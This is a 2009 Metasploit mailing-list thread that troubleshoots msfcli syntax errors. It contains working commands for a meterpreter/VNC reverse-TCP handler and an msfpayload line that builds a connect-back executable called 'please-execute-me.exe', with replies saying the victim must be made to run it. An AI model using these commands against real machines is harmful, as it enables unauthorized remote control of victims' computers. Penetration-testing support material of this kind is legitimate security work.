Metasploit mailing list archives

msfcli


From: krasn at ans.gr (Nicolas Krassas)
Date: Sat, 28 Mar 2009 19:09:07 +0200

Anastasios, true i notice it much later.

Thanks 
  ----- Original Message ----- 
  From: Anastasios Monachos 
  To: Nicolas Krassas 
  Cc: framework at spool.metasploit.com 
  Sent: Saturday, March 28, 2009 4:24 PM
  Subject: Re: [framework] msfcli


  Nicolas,



  2009/3/27 Nicolas Krassas <krasn at ans.gr>

    Greetings,
      I've encountered a strange problem on msfcli, i'm pasting the lines below,

    root at fr:~/trunk# ./msfcli exploit/multi/handler PAYLOAD=windows/metepreter/reverse_tcp LHOST=91.xxx.xx.xxx E
    [*] Please wait while we load the module tree...
    ./msfcli:150: undefined method `datastore' for nil:NilClass (NoMethodError)


  It is meterpreter not metepreter, you missed the "r"




    root at fr:~/trunk# ./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.112 
LPORT=2482 DisableCourtesyShell=TRUE E
    [*] Please wait while we load the module tree...
    [*] Handler binding to LHOST 0.0.0.0
    [*] Started reverse handler
    [*] Starting the payload handler...
    [-] Exploit failed:

    Here above i just pressed ctrl c to interrupt the cli


  Syntax is corrent, but your victim needs somehow to execute the appropriate payload, you can build it using 
msfpayload as:
  ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 X > please-execute-me.exe


   

    root at fr:~/trunk# ./msfcli exploit/multi/handler PAYLOAD=windows/metepreter/reverse_tcp LHOST=91.xxx.xx.xxx LPORT 
4444 DisableCourtesyShell=TRUE E
    [*] Please wait while we load the module tree...
    ./lib/msf/core/data_store.rb:93:in `each': The argument could not be parsed correctly. (Rex::ArgumentParseError)
          from ./lib/msf/core/data_store.rb:93:in `import_options_from_s'
          from ./msfcli:140

    Again error when i'm using the correct ip address of the host,

  Wrong syntax, you have missed the equal sign in the LPORT parameter, it should be LPORT=4444

   



    ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp  E
    [*] Please wait while we load the module tree...
    [-] Exploit failed: The following options failed to validate: LHOST.

    And finally

    root at fr:~/trunk# ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=91.xxx.xx.xxx  E
    [*] Please wait while we load the module tree...
    [*] Handler binding to LHOST 0.0.0.0
    [*] Started reverse handler
    [*] Starting the payload handler...



  Syntax corrent, all you need to do, it make the victim execute the payload, as described previously...

   

    The commands where used one after the other, no change was done on the system in between.

    Regards,
    Dinos 
    _______________________________________________
    https://mail.metasploit.com/mailman/listinfo/framework



  Hope the above would work for you.
  -- 
  AM
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090328/febec06a/attachment.htm>


Current thread: